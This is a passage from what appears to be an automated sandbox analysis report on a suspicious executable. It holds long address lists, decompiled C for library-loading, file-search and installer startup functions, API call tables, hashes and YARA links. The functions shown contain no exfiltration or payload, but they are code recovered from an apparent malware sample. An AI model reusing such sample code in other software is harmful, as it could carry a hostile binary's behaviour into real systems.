                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x00000000
                                                                                    0x00406509
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x00000000
                                                                                    0x0040679a
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00000000
                                                                                    0x0040690d
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                    • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                    • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                    • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                    0x00405e90
                                                                                    0x00405e93
                                                                                    0x00405e9a
                                                                                    0x00405ea2
                                                                                    0x00405eaf
                                                                                    0x00000000
                                                                                    0x00405eb6
                                                                                    0x00405ea5
                                                                                    0x00405ead
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ebe

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                    • String ID:
                                                                                    • API String ID: 310444273-0
                                                                                    • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                    • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                    • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                    • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                    0x00405e6c
                                                                                    0x00405e75
                                                                                    0x00000000
                                                                                    0x00405e82
                                                                                    0x00405e78
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,7519F560,0040549F,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 00405E6C
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                    • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                    • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                    • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                    0x004036b5
                                                                                    0x004036be
                                                                                    0x004036c5
                                                                                    0x004036c7
                                                                                    0x004036db
                                                                                    0x004036ed
                                                                                    0x004036f7
                                                                                    0x004036fc
                                                                                    0x00403702
                                                                                    0x00403715
                                                                                    0x00403715
                                                                                    0x00403720
                                                                                    0x004036c9
                                                                                    0x004036d4
                                                                                    0x004036d4
                                                                                    0x00403725
                                                                                    0x0040372f
                                                                                    0x00403738
                                                                                    0x0040373d
                                                                                    0x0040374e
                                                                                    0x004037d5
                                                                                    0x004037dd
                                                                                    0x004037e6
                                                                                    0x004037e6
                                                                                    0x004037fc
                                                                                    0x00403802
                                                                                    0x00403810
                                                                                    0x0040389f
                                                                                    0x004038a7
                                                                                    0x004038b1
                                                                                    0x004038b6
                                                                                    0x004038bc
                                                                                    0x00403946
                                                                                    0x0040394b
                                                                                    0x0040394d
                                                                                    0x00403969
                                                                                    0x00000000
                                                                                    0x00403969
                                                                                    0x0040394f
                                                                                    0x00403955
                                                                                    0x0040395d
                                                                                    0x0040395d
                                                                                    0x00000000
                                                                                    0x00403955
                                                                                    0x004038ca
                                                                                    0x004038db
                                                                                    0x004038dd
                                                                                    0x004038df
                                                                                    0x004038e6
                                                                                    0x004038e6
                                                                                    0x004038ee
                                                                                    0x004038f6
                                                                                    0x004038f8
                                                                                    0x004038fa
                                                                                    0x00403903
                                                                                    0x00403906
                                                                                    0x0040390c
                                                                                    0x0040390c
                                                                                    0x0040392b
                                                                                    0x0040393c
                                                                                    0x00000000
                                                                                    0x00403941
                                                                                    0x004038a9
                                                                                    0x004038ab
                                                                                    0x00000000
                                                                                    0x00403816
                                                                                    0x00403816
                                                                                    0x0040381c
                                                                                    0x00403826
                                                                                    0x0040382e
                                                                                    0x00403838
                                                                                    0x0040383e
                                                                                    0x0040384c
                                                                                    0x0040396e
                                                                                    0x0040396e
                                                                                    0x00000000
                                                                                    0x0040396e
                                                                                    0x00403852
                                                                                    0x0040385b
                                                                                    0x0040389a
                                                                                    0x00000000
                                                                                    0x0040389a
                                                                                    0x00403754
                                                                                    0x00403754
                                                                                    0x00403759
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403763
                                                                                    0x00403773
                                                                                    0x00403778
                                                                                    0x0040377f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403783
                                                                                    0x00403785
                                                                                    0x00403792
                                                                                    0x00403792
                                                                                    0x0040379a
                                                                                    0x004037a0
                                                                                    0x004037c8
                                                                                    0x004037d0
                                                                                    0x00000000
                                                                                    0x004037b2
                                                                                    0x004037b3
                                                                                    0x004037bc
                                                                                    0x004037c2
                                                                                    0x004037c3
                                                                                    0x00000000
                                                                                    0x004037c3
                                                                                    0x004037be
                                                                                    0x004037c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004037c0
                                                                                    0x004037a0

                                                                                    APIs
                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                    • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ), ref: 00403795
                                                                                    • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                    • LoadImageA.USER32 ref: 004037FC
                                                                                      • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                    • RegisterClassA.USER32 ref: 00403843
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                    • CreateWindowExA.USER32 ref: 00403894
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                    • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                    • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                    • GetClassInfoA.USER32 ref: 004038F6
                                                                                    • GetClassInfoA.USER32 ref: 00403903
                                                                                    • RegisterClassA.USER32 ref: 0040390C
                                                                                    • DialogBoxParamA.USER32 ref: 0040392B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
